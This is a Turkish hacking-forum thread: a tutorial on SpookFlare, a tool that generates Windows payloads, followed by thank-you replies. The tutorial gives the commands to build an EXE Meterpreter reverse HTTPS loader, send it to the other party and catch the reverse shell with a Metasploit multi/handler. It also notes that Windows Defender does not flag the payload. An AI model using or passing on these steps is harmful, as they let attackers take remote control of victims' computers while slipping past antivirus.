Turkhackteam.org/net - Ethical Hacking & Cyber Security Platform

Turkhackteam.org/net - Ethical Hacking & Cyber Security Platform (https://www.turkhackteam.org/)
-   Siber Güvenlik (https://www.turkhackteam.org/siber-guvenlik/)
-   -   SpookFlare ile Güvenlik Duvarını Aşın // Qwx (https://www.turkhackteam.org/siber-guvenlik/1801062-spookflare-ile-guvenlik-duvarini-asin-qwx.html)

Qwx 22-01-2019 22:47 22:47

SpookFlare ile Güvenlik Duvarını Aşın // Qwx
 
SpookFlare

Merhaba, sizlere tanıtacağım aracın adı SpookFlare.
SpookFlare, günümüzde en fazla kullanılan işletim sistemi Windows da ki güvenlik önlemlerini aşmak adına yapılmış olan bu araç Python dili ile yazılmıştır oluşturulan payload da C# dili ile yazılmıştır. Ek olan yapımcısı bir Türk olan aracın 2.0 versiyonu ile 3 tane özellik kazandırılmıştır. Bu yeni getirilen özelliklerde PowerShell, Visual Basic Script ve Javascript ile yazılmıştır.

SpookFlare GitHub Adresi ;


https://github.com/hlldz/SpookFlare


Kurulum ;

İlk önce aracımızı sistemimize indiriyoruz.

Kod:

git clone https://github.com/hlldz/SpookFlare.git


https://i.postimg.cc/GhZr7Qs9/gitclone.jpg

İndirme işlemi tamamlandıktan sonra dosyanın içerisine girip pip yüklememizi gerçekleştireceğiz.


Kod:

pip install -r requirements.txt


https://i.postimg.cc/qRbH8XTJ/pip.jpg

Evet indirme ve kurulum adı altında tüm işlemlerimiz bitmiş bulunmaktadır. Şimdi sırada aracımızı çalıştırmak ve kullanım hakkında örnek göstermek olacaktır.


Kullanım ;



Kod:

python spookflare.py


https://i.postimg.cc/tJsQDZqh/acilis.jpg


Kodu ile aracımızı açıyoruz. help kodunu yazdığımız zaman bizim karşımıza hangi komutların var olduğu çıkmaktadır. list komutu ile bu araçta neler yapabileceklerimizi görmekteyiz.

https://i.postimg.cc/wTsYmmbz/goster.jpg
Biz bugün örneğimizde .EXE Meterpreter Reverse HTTP and HTTPS loader uygulamasını göreceğiz.


Kod:

use 1



Ardından info komutu ile bizden hangi parametreleri girmemiz istenmektedir bunu öğreniyoruz.


https://i.postimg.cc/d3bXB5SY/info.jpg


Evet bizden 5 tane parametre istemektedir. Protocol, Local host, Local port, İşletim sistemi biti ve Met.asploit'i entegre ettiysek onun boyutu. Bunların girişini yapıyoruz. Met.asploit'in boyutunu öğrenmek için;
/usr/share/****sploit-framework/lib/msf/core/payload/windows/x64/
bu dizine giriş sağlıyoruz ve meterpreter_loader.rb 'yi açıyoruz. Ardından en aşağıda olan #dll kısmındaki byte değerini okuyoruz.



Kod:

set PROTO https
Kod:

set LHOST <ipaddres>
set LPORT 443
set x64/x86
set SSIZE <int>
generate



https://i.postimg.cc/gcx2grBS/olustu.jpg


Kodlarımızı tamamladık ve payload'ımız oluştu. Şimdi oluşturduğumuz payloadı karşı tarafa atıyoruz ve Met.asploit üzerinden dinlemeye başlıyoruz. Met.asploit üzerinden oluşturduğumuz payloadı dinlemek için;


Kod:

use exploit/multi/handler
Kod:

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <ipadress>
set LPORT 443

run




https://i.postimg.cc/pT139Wfy/msfc.jpg



Karşı taraf bizim payloadımızı açtığı zaman bize bilgiler gelmektedir. Ek olarak Windows Defender payloadımız da herhangi bir virüs algılamamaktadır.


https://i.postimg.cc/Pf0r9hgt/open.jpg


Bir araç tanıtımımızın daha sonuna gelmiş bulunmaktayız. Bir sonraki araç tanıtımında görüşmek üzere esen kalınız.

ClayHackers2111 22-01-2019 23:50 23:50

Eline sağlık güzel konu olmuş

RooTGHoST 22-01-2019 23:53 23:53

Elinize Sağlık Emek Verilmiş Bir Konu Olmuş...

DarqRisus 22-01-2019 23:59 23:59

Eline emeğine sağlık dostum.

sessizlik235 23-01-2019 00:01 00:01

teşekkürler çok yararlı bir konu olmus eline sağlık

Qwx 23-01-2019 18:53 18:53

Alıntı:

ClayHackers2111´isimli üyeden Alıntı (Mesaj 8600385)
Eline sağlık güzel konu olmuş

Alıntı:

RooTGHoST´isimli üyeden Alıntı (Mesaj 8600390)
Elinize Sağlık Emek Verilmiş Bir Konu Olmuş...

Alıntı:

DarqRisus´isimli üyeden Alıntı (Mesaj 8600403)
Eline emeğine sağlık dostum.

Alıntı:

sessizlik235´isimli üyeden Alıntı (Mesaj 8600413)
teşekkürler çok yararlı bir konu olmus eline sağlık

Çok teşekkür ederim. .

MrTarget 23-01-2019 19:47 19:47


Eline sağlık.Yararlı konu olmuş.
Faydalı

Qwx 23-01-2019 22:17 22:17

Alıntı:

MrTarget´isimli üyeden Alıntı (Mesaj 8601711)

Eline sağlık.Yararlı konu olmuş.
Faydalı

Çok teşekkür ederim . .

"P4RS 23-01-2019 22:18 22:18

Elinize emeğinize sağlık albayım. Güzel bir konu olmuş.


Şu Anki Saat: 16:55

Powered by vBulletin® Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.